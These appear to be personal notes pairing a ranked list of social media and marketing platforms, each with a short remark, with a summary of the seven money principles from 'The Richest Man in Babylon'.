1. Instagram (just highlights of events)
2. YouTube (long form)
3. Snapchat (the new TV, least trash talking)
4. Facebook (all of the marketing at once) (not as cool anymore, but it's a scrolling tool and a mix of everything) (great ad platform, data company)
5. Podcast (it's a radio, hands/eye free while playing something)
6. Twitter (chatter, trash, news, fun)
7. Live streaming (virtual reality, the most interactive with lots of comments)
8. The 'Wild card' is email lists (old school and powerful)

###########


Richest man in Babylon

The Richest Man in Babylon has 7 basic principles:

1) Start thy purse to fattening - save/invest
2) Control thy expenditures - watch out for self serving brokers
3) Make thy gold multiply - use powerful investments
4) Guard thy treasures from loss - watch out for brokers with their hot tips.
5) Make of thy dwelling a profitable investment - rental properties, your own home---but stay within your means.
6) Insure a future income - do work that you love to do. Become excellent at it.
7) Increase thy ability to earn - education never stops. Keep reading good books like this one, The Millionaire Next Door, Rich Dad Poor Dad and so on.